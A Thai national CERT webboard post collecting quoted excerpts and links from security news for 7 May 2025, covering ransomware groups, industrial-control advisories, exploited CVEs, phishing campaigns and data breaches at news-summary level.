NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 07 May 2025

    Cyber Security News
    1
    1
    291
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย

      Financial Sector

      • The Top Threat Actor Groups Targeting The Financial Sector
        "Between April 2024 and April 2025, Flashpoint analysts observed the financial sector as a top target of threat actors, with 406 publicly disclosed victims falling prey to ransomware attacks alone—representing seven percent of all ransomware victim listings during that period. However, ransomware is just one piece of the complex threat actor puzzle. The financial sector is also grappling with threats stemming from sophisticated Advanced Persistent Threat (APT) groups, the risks associated with third-party compromises, the illicit trade in initial access credentials, the ever-present danger of insider threats, and the emerging challenge of deepfake and impersonation fraud."
        https://flashpoint.io/blog/top-threat-actor-groups-targeting-financial-sector/

      Industrial Sector

      • Optigo Networks ONS NC600
        "Successful exploitation of this vulnerability could allow an attacker to establish an authenticated connection with the hard-coded credentials and perform OS command executions."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-126-01
      • BrightSign Players
        "Successful exploitation of this vulnerability could allow for privilege escalation on the device, easily guessed passwords, or for arbitrary code to be executed on the underlying operating system."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-126-03
      • Milesight UG65-868M-EA
        "Successful exploitation of this vulnerability could allow any user with admin privileges to inject arbitrary shell commands."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-126-02

      Vulnerabilities

      • Canary Exploit Tool For CVE-2025-30065 Apache Parquet Avro Vulnerability
        "On April 1st, 2025, CVE-2025-30065 was published, although rumors had been swirling on various platforms for several days before about a very high severity security issue with Apache Parquet, leading to much consternation within the IT community. F5 began receiving calls from worried customers asking questions about this vulnerability in their own systems as early as March 29th, three days before it was publicly disclosed. At this time very little was known about the issue, only that it was possibly very serious. As it turned out, CVE-2025-30065 was issued as a CVSS 10.0 (Critical) vulnerability in Apache Parquet Java. Patches were immediately issued, customers were able to assess their exposure, and the attention seen previously began to wane."
        https://www.f5.com/labs/articles/threat-intelligence/canary-exploit-tool-for-cve-2025-30065-apache-parquet-avro-vulnerability
        https://www.bleepingcomputer.com/news/security/apache-parquet-exploit-tool-detect-servers-vulnerable-to-critical-flaw/

      Malware

      • Smishing On a Massive Scale: "Panda Shop" Chinese Carding Syndicate
        "Resecurity was the first company to identify the Smishing Triad, a group of Chinese cybercriminals targeting consumers across the globe. In August 2023, our team was able to identify their activity and locate the smishing kit they were using, successfully exploiting a vulnerability, which exposed the threat actors and their infrastructure. Since then, the group has become stealthier and upgraded its tooling, tactics, and procedures (TTPs). A group of this scale is not limited to just one threat actor; it has numerous associates with different roles, blurring its public profile. Such groups leverage a "Crime-as-a-Service" model, enabling other cybercriminals to use their smishing kit and scale their operations targeting consumers in different countries."
        https://www.resecurity.com/blog/article/smishing-massive-scale-panda-shop-chinese-carding-syndicate
        https://securityaffairs.com/177502/cyber-crime/smishing-on-a-massive-scale-panda-shop-chinese-carding-syndicate.html
        https://www.infosecurity-magazine.com/news/smishing-triad-upgrades-tools/
      • Arctic Wolf Observes Exploitation Of Path Traversal Vulnerability In Samsung MagicINFO 9 Server (CVE-2024-7399)
        "As of early May 2025, Arctic Wolf has observed exploitation in the wild of CVE-2024-7399 in Samsung MagicINFO 9 Server—a content management system (CMS) used to manage and remotely control digital signage displays. The vulnerability allows for arbitrary file writing by unauthenticated users, and may ultimately lead to remote code execution when the vulnerability is used to write specially crafted JavaServer Pages (JSP) files. This high-severity vulnerability had originally been made public by Samsung in August 2024 following responsible disclosure by security researchers, with no exploitation reported at the time. On April 30, 2025, a new research article was published along with technical details and a proof-of-concept (PoC) exploit. Exploitation was then observed within days of that publication."
        https://arcticwolf.com/resources/blog/cve-2024-7399/
        https://www.bleepingcomputer.com/news/security/samsung-magicinfo-9-server-rce-flaw-now-exploited-in-attacks/
        https://www.securityweek.com/samsung-magicinfo-vulnerability-exploited-days-after-poc-publication/
        https://www.helpnetsecurity.com/2025/05/06/exploited-vulnerability-software-managing-samsung-digital-displays-cve-2024-7399/
        https://securityaffairs.com/177529/hacking/samsung-magicinfo-vulnerability-exploited-after-poc-publication.html
      • Defending Against UNC3944: Cybercrime Hardening Guidance From The Frontlines
        "UNC3944, which overlaps with public reporting on Scattered Spider, is a financially-motivated threat actor characterized by its persistent use of social engineering and brazen communications with victims. In early operations, UNC3944 largely targeted telecommunications-related organizations to support SIM swap operations. However, after shifting to ransomware and data theft extortion in early 2023, they impacted organizations in a broader range of industries. Since then, we have regularly observed UNC3944 conduct waves of targeting against a specific sector, such as financial services organizations in late 2023 and food services in May 2024. Notably, UNC3944 has also previously targeted prominent brands, possibly in an attempt to gain prestige and increased attention by news media."
        https://cloud.google.com/blog/topics/threat-intelligence/unc3944-proactive-hardening-recommendations
        https://www.bankinfosecurity.com/retail-sector-in-scattered-spider-crosshairs-a-28316
        https://www.infosecurity-magazine.com/news/dragonforce-goup-ms-coop-harrods/
      • DragonForce Ransomware: Redefining Hybrid Extortion In 2025
        "The ransomware world isn’t just evolving—it’s fragmenting, decentralizing, and growing more dangerous. In this volatile landscape, DragonForce is emerging as one of the most intriguing and threatening actors of 2025. Born from possible hacktivist roots and now fully immersed in the economics of cyber crime, DragonForce represents a new era of hybrid threats: ideologically ambiguous, technologically agile, and fiercely opportunistic."
        https://blog.checkpoint.com/security/dragonforce-ransomware-redefining-hybrid-extortion-in-2025/
      • Microsoft Dynamics 365 Customer Voice Phishing Scam
        "Check Point researchers have identified a new phishing campaign that exploits Microsoft’s “Dynamics 365 Customer Voice,” a customer relationship management software product. It’s often used to record customer calls, monitor customer reviews, share surveys and track feedback. Microsoft 365 is used by over 2 million organizations worldwide. At least 500,000 organizations use Dynamics 365 Customer Voice, including 97% of Fortune 500 companies."
        https://blog.checkpoint.com/research/microsoft-dynamics-365-customer-voice-phishing-scam/
      • CoGUI Phish Kit Targets Japan With Millions Of Messages
        "Proofpoint has observed a notable increase in high-volume Japanese language campaigns targeting organizations in Japan to deliver a phishing kit that Proofpoint researchers refer to as CoGUI. Most of the observed campaigns abuse popular consumer or payment brands in phishing lures, including Amazon, PayPay, Rakuten, and others. The CoGUI phishing kit is a highly evasive phishing framework identified by Proofpoint researchers, primarily targeting users in Japan. Several campaigns were observed targeting users in Australia, New Zealand, Canada and the United States, but these occurred much less frequently than in Japan."
        https://www.proofpoint.com/us/blog/threat-insight/cogui-phish-kit-targets-japan-millions-messages
      • Second Wave Of Attacks Hitting SAP NetWeaver After Zero-Day Compromise
        "Threat actors have been observed launching a second wave of attacks against SAP NetWeaver instances that were compromised via a recent zero-day vulnerability, enterprise application security firm Onapsis warns. The zero-day, tracked as CVE-2025-31324 (CVSS score of 10/10), was disclosed on April 24, after SAP updated its April 2025 Security Patch Day bulletin to add a fresh note addressing it. In-the-wild exploitation of the bug was observed by cybersecurity firm ReliaQuest on systems that had the latest patches installed and was associated with initial access brokers. According to Mandiant, the flaw had been exploited since at least mid-March 2025."
        https://www.securityweek.com/second-wave-of-attacks-hitting-sap-netweaver-after-zero-day-compromise/
        https://securityaffairs.com/177522/hacking/experts-warn-of-a-second-wave-of-attacks-targeting-sap-netweaver-bug-cve-2025-31324.html
      • Here Comes Mirai: IoT Devices RSVP To Active Exploitation
        "Endpoints have been forcibly saying “I do” to Mirai since 2016, and some retired GeoVision devices are among the latest “proposals.” In early April 2025, the Akamai SIRT discovered activity targeting the URI /DateSetting.cgi in our global network of honeypots. After further investigation, we were able to attribute this activity to command injection vulnerabilities (CVE-2024-6047 and CVE-2024-11120) that were previously disclosed in GeoVision devices. Despite being “known” vulnerabilities, there was little more than the assigned CVE numbers actually known about them, at least publicly. Attribution — along with the scope of the threat, which is limited to retired GeoVision IoT devices — was ultimately validated directly by the vendor."
        https://www.akamai.com/blog/security-research/active-exploitation-mirai-geovision-iot-botnet
        https://thehackernews.com/2025/05/hackers-exploit-samsung-magicinfo.html
      • Uncovering Actor TTP Patterns And The Role Of DNS In Investment Scams
        "According to the Federal Trade Commission (FTC), consumers lost more money to investment scams than any other kind in 2024. This equates to a 24 percent increase from 2023 to 2024 in the amount of money lost—a total of US$5.7 billion1. These threats take a variety of forms, including the so-called pig butchering scams, which generally start with generic text messages to ones advertised through social media. Sometimes human interaction is involved and sometimes it is not. We track several investment scam actors and we’ve previously published research on two of them, Savvy Seahorse and Horrid Hawk, who have distinctive DNS fingerprints."
        https://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/
        https://thehackernews.com/2025/05/new-investment-scams-use-facebook-ads.html
      • Lampion Is Back With ClickFix Lures
        "Unit 42 researchers recently uncovered a highly focused malicious campaign targeting dozens of Portuguese organizations, particularly in the government, finance and transportation sectors. This campaign was orchestrated by the threat actors behind Lampion malware, an infostealer that focuses on sensitive banking information. This malware family has been active since at least 2019. During our investigation, we found that the group has added ClickFix lures to their arsenal. ClickFix is a social engineering technique that multiple malware families have adopted since late 2024, which lures victims to copy and execute malicious commands on their machine, under the guise of fixing computer problems."
        https://unit42.paloaltonetworks.com/lampion-malware-clickfix-lures/

      Breaches/Hacks/Leaks

      • UK Legal Aid Agency Investigates Cybersecurity Incident
        "The Legal Aid Agency (LAA), an executive agency of the UK's Ministry of Justice that oversees billions in legal funding, warned law firms of a security incident and said the attackers might have accessed financial information. Approximately 2,000 providers, including barristers, solicitor firms, and non-profit organizations, deliver civil and criminal legal aid services in England and Wales under contracts with the LAA. The agency employs around 1,250 staff and runs the country's Public Defender Service. In a letter sent to law firms, the agency said it cannot confirm if any data was accessed. Still, it acknowledged the risk that legal aid providers' payment information might have been compromised, as Sky News first reported."
        https://www.bleepingcomputer.com/news/security/uk-legal-aid-agency-investigates-cybersecurity-incident/
      • “Your Privacy Is a Promise We Don’t Break”: Dating App Raw Exposes Sensitive User Data
        "Any app that hands over user data is a concern, but leaky dating apps are especially worrying given the sensitivity of the data involved. A relatively new app called Raw that aims to rewrite the rules of dating is the latest to trip over its coattails by exposing user data to…well, anyone who asked for it. Launched in 2023, Raw is a dating app that aims to solve some of the traditional problems in online dating, including fake or egregiously touched-up photos, and ghosting (where one person goes silent on each other). The company’s app shares user locations and asks them to post daily photos of themselves to create a more authentic matching experience."
        https://www.malwarebytes.com/blog/news/2025/05/your-privacy-is-a-promise-we-dont-break-dating-app-raw-exposes-sensitive-user-data
      • Multiple iHeartRadio Stations Breached In December
        "Several radio stations owned by iHeartMedia were breached in December, exposing Social Security numbers, financial information and other personal details. The media conglomerate filed breach notices in several states but declined to say how many people were impacted or how many stations were attacked when reached for comment."
        https://therecord.media/iheart-radio-stations-breached-december
      • Texas School District Notifies Over 47,000 People Of Major Data Breach
        "A data breach affecting Alvin Independent School District (AISD) in Texas has compromised sensitive personal information belonging to 47,606 individuals. The district confirmed the breach, which occurred in June 2024, and began notifying impacted people over the weekend. Exposed information includes names, Social Security numbers, state-issued IDs, credit and debit card details, financial account numbers, medical data and health insurance information. The incident was reported by the Texas attorney general on May 2 2025."
        https://www.infosecurity-magazine.com/news/texas-school-47000-people-data/

      General News

      • What It Really Takes To Build a Resilient Cyber Program
        "In this Help Net Security interview, Dylan Owen, CISO at Nightwing, talks about what it really takes to build an effective defense: choosing the right frameworks, setting up processes, and getting everyone on the same page. Drawing on both military and private sector experience, Owen explains how preparation, communication, and constant adjustment are key to building a more proactive security approach."
        https://www.helpnetsecurity.com/2025/05/06/dylan-owen-nightwing-cyber-defense-strategy/
      • How Cybercriminals Exploit Psychological Triggers In Social Engineering Attacks
        "Most attacks don’t start with malware; they begin with a message that seems completely normal, whether it comes through email, a phone call, or a chat, and that is exactly what makes them so effective. These threats rely on psychological manipulation to bypass people, not firewalls. Pressure is applied, authority is faked, and communication is mimicked. Social engineering threats account for most cyberthreats faced by individuals in 2024, according to Avast."
        https://www.helpnetsecurity.com/2025/05/06/social-engineering-human-behavior/
      • As Vishing Gains Momentum, It’s Time To Fight Back
        "The mechanisms and dangers of email phishing are well known, as are the best practices for hardening organizations against it. Its spin-off, called vishing, is nothing new, but it’s both rapidly evolving, and unlike the more mainstream counterpart, too often overlooked by security professionals. According to the CrowdStrike 2025 Global Threat Report, these offbeat attacks saw a 442% increase in the second half of 2024 compared to the first half of the year. This dramatic spike should be interpreted as a call to action in terms of countermeasures, especially in enterprise environments."
        https://www.tripwire.com/state-of-security/vishing-gains-momentum-its-time-fight-back
      • Ransomware Attacks April 2025: Qilin Emerges From Chaos
        "Global ransomware attacks in April 2025 declined to 450 from 564 in March – the lowest level since November 2024 – as major changes among the leading Ransomware-as-a-Service (RaaS) groups caused many affiliates to align with new groups. Still, the long-term trend for ransomware attacks remains decidedly upward (chart below) so April’s decline could be reversed as soon as new RaaS leaders are established."
        https://cyble.com/blog/qilin-tops-april-2025-ransomware-report/
      • Addressing The Top Cyber-Risks In Higher Education
        "As city-like microcosms, colleges and universities have become prime targets of cyberattacks. Their classrooms, student housing, athletics facilities and venues, retail locations, and, in some cases, public safety and clinical locations are all connected to the same network, creating a large and complex landscape for potential attacks."
        https://www.darkreading.com/vulnerabilities-threats/addressing-top-cyber-risks-higher-education
      • And The Cloud Goes Wild: Looking At Vulnerabilities In Cloud Assets
        "We admit it – we’ve had our heads in the clouds recently. Since we started working with Wiz as one of their integration partners, we’ve been spending even more time thinking about cloud assets. And these assets are everywhere! Gartner predicts double digit growth across all cloud segments in 2025. More and more organizations are adopting multi-cloud strategies that spread their assets across multiple hosting providers and more and more IT infrastructure spending is shifting from on-premise hosting to cloud."
        https://www.cycognito.com/blog/and-the-cloud-goes-wild-looking-at-vulnerabilities-in-cloud-assets/
        https://hackread.com/cloud-vulnerability-data-google-cloud-leads-risk/
      • What a Future Without CVEs Means For Cyber Defense
        "The importance of the MITRE-run Common Vulnerabilities and Exposures (CVE) Program shouldn’t be understated. For 25 years, it has acted as the point of reference for cybersecurity professionals to understand and mitigate security flaws. By providing a standardized method for naming and cataloguing known vulnerabilities, it offers defenders a shared language for understanding, prioritizing, and responding to real-world threats. The program has traditionally relied on US government funding to sustain operations and, unfortunately, and equivalent databases that operate on the same scale aren’t readily available. Thus, the decision from the US government to row back its guardianship of the program has been met with industry surprise and concern."
        https://www.helpnetsecurity.com/2025/05/06/cve-program-foundation/
      • Applying The OODA Loop To Solve The Shadow AI Problem
        "With AI introducing efficiency, automation, and reduced operational costs, organizations are embracing AI tools and technology with open arms. At the user level, more employees resort to personal AI tools to save time, work smarter, and increase productivity. According to a study in October 2024, Seventy-five percent of knowledge workers currently use AI, with 46% stating they would not relinquish it even if their organization did not approve of its use. Organizations are confronting the challenge of shadow AI, as employees utilize unauthorized AI tools without company consent, leading to risks related to data exposure, compliance, and operations."
        https://www.securityweek.com/applying-the-ooda-loop-to-solve-the-shadow-ai-problem/
      • Hacker Conversations: John Kindervag, a Making Not Breaking Hacker
        "Kindervag is a hacker – sort of. But he is not the sort of hacker we have come to expect. John Kindervag is best known for developing the Zero Trust Model in 2009 while he was a principal analyst at Forrester Research. In essence, zero trust is based on the principle of ‘never trust, always verify’. He is currently, since September 2023, Chief Evangelist at Illumio, where he is tasked with “driving the adoption of Zero Trust Segmentation through high-touch advocacy and forward-thinking thought leadership”. He is not the typical hacker in today’s terminology."
        https://www.securityweek.com/hacker-conversations-john-kindervag-a-making-not-breaking-hacker/
      • Entra ID Data Protection: Essential Or Overkill?
        "Microsoft Entra ID (formerly Azure Active Directory) is the backbone of modern identity management, enabling secure access to the applications, data, and services your business relies on. As hybrid work and cloud adoption accelerate, Entra ID plays an even more central role — managing authentication, enforcing policy, and connecting users across distributed environments. That prominence also makes it a prime target. Microsoft reports over 600 million attacks on Entra ID every day. These aren't just random attempts, but include coordinated, persistent, and increasingly automated campaigns designed to exploit even small vulnerabilities."
        https://thehackernews.com/2025/05/entra-id-data-protectionessential-or.html

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) 2954031c-74da-4e65-9fa9-d9ded79ec16e-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post